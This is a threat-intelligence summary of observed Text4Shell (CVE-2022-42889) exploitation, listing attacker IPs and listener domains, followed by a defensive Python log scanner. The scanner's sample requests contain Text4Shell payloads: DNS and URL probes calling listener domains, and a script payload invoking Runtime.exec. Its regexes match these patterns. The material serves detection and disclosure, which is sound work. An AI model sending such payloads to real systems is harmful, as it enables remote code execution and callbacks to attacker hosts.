Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to contact attacker-controlled listener domains, with some payloads designed to trigger actual code execution via script payloads and listener callbacks.
#Text4Shell #CVE-2022-42889 #ApacheCommonsText #Interactsh #Canarytokens #Wordfence
Key points
- Text4Shell is a remote code execution vulnerability in Apache Commons Text versions 1.5 through 1.9; it was patched in 1.10.0.
- Wordfence began monitoring for CVE-2022-42889 activity on Oct 18, 2022 across a network of about 4 million websites.
- The majority of observed payloads appear in DNS prefix form and are used to scan for vulnerable installations; a successful attempt would cause the victim site to query attacker-controlled domains.
- Script prefix payloads can execute code (e.g., using Java code) to perform actions like contacting a listener or running commands.
- DNS, script, and URL prefixes each have different roles, with DNS being the most common probe method and URL prefix being the least common.
- Tracked indicators include a long list of IPs and numerous listener domains (e.g., tress.cf, oast.online, canarytokens.com), indicating broad scanning and potential C2 callbacks.
- Wordfence Intelligence IP Threat Feed updates hourly with new observed RCE activity related to this CVE; Ramuel Gall authored the article.
MITRE Techniques
- [T1203] Exploitation for Client Execution – Remote code execution enabled by Text4Shell; "Text4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution."
- [T1071.004] Application Layer Protocol: DNS – DNS prefix payloads cause the victim to contact attacker-controlled listener domains; "The vast majority of requests we are seeing are using the DNS prefix … a successful attempt would result in the victim site making a DNS query to the attacker-controlled listener domain."
- [T1059.007] Java – Script payloads invoke Java code to run commands; "…java.lang.Runtime.getRuntime().exec(…)" (as shown in the payload example)
Indicators of Compromise
- [IP Address] IP addresses observed sending requests targeting the vulnerability – 103.127.158.166*, 13.53.121.211*, and many more (see full list in article).
- [Domain] Attacker-controlled listener and related domains – tress.cf, oast.online, oast.site, canarytokens.com, and other listed listeners (e.g., oast.live, oast.me).
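The key points above describe three interpolator prefixes (dns, script, url) and the indicator list names the listener domains those probes call back to. As an added defender-side example, not code from the Wordfence article, the Python below scans request lines for the Commons Text `${prefix:...}` interpolation pattern, undoes URL encoding first (a probe sent as `%24%7Bdns...` is otherwise missed), classifies the prefix, and checks any hostname in the payload body against the listener domains listed on this page. The request lines are constructed samples, and the regexes, function names and the `KNOWN_LISTENERS` set are my own assumptions about how such a check would be written.

```python
import re
from urllib.parse import unquote

# Listener domains taken from the article's indicator list (assumed complete enough for a demo).
KNOWN_LISTENERS = {
    "tress.cf", "oast.online", "oast.site", "canarytokens.com", "oast.live", "oast.me",
}

# The three Commons Text interpolators named in the key points: ${dns:...}, ${script:...}, ${url:...}
INTERPOLATOR_RE = re.compile(r"\$\{\s*(dns|script|url)\s*:([^}]*)\}", re.IGNORECASE)

# Hostname-like tokens inside the interpolator body. Heuristic: a script body can also
# yield Java package names, which is why matches are checked against KNOWN_LISTENERS.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)

# Constructed sample request lines, not real traffic.
SAMPLE_REQUESTS = [
    "GET /?search=${dns:address|abc123.tress.cf} HTTP/1.1",
    "GET /?q=%24%7Bdns%3Aaddress%7Cxyz.oast.online%7D HTTP/1.1",
    "GET /?q=${url:UTF-8:http://callback.oast.site/x} HTTP/1.1",
    "POST /contact name=${script:javascript:java.lang.Runtime.getRuntime().exec(...)} HTTP/1.1",
    "GET /?page=2 HTTP/1.1",
]


def decode(s, rounds=3):
    """Strip up to `rounds` layers of URL encoding so encoded probes are matched too."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def listener_of(host):
    """Return the known listener domain a host belongs to (exact or subdomain), else None."""
    host = host.lower()
    for base in KNOWN_LISTENERS:
        if host == base or host.endswith("." + base):
            return base
    return None


def scan_request(raw):
    """Return one finding per interpolator found in a request line; an empty list means clean."""
    text = decode(raw)
    findings = []
    for m in INTERPOLATOR_RE.finditer(text):
        hosts = HOST_RE.findall(m.group(2))
        known = None
        for h in hosts:
            known = listener_of(h)
            if known:
                break
        findings.append({
            "prefix": m.group(1).lower(),
            "hosts": hosts,
            "known_listener": known,
            "encoded": text != raw,   # True when the probe arrived URL-encoded
        })
    return findings


def summarize(requests):
    """Count probes per prefix and collect the listener domains seen across many requests."""
    counts = {"dns": 0, "script": 0, "url": 0}
    listeners = set()
    for r in requests:
        for f in scan_request(r):
            counts[f["prefix"]] += 1
            if f["known_listener"]:
                listeners.add(f["known_listener"])
    return counts, sorted(listeners)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line, "->", scan_request(line))
    print(summarize(SAMPLE_REQUESTS))
```

Run over the samples, the dns prefix dominates the counts and three of the page's listener domains are recovered, which mirrors the article's observation that DNS probes to attacker-controlled listeners make up most of the traffic. A production version would feed `summarize` from the web server access log and alert on any `known_listener` hit or on any `script` prefix at all, since a script payload is the one that reaches actual code execution rather than a DNS lookup.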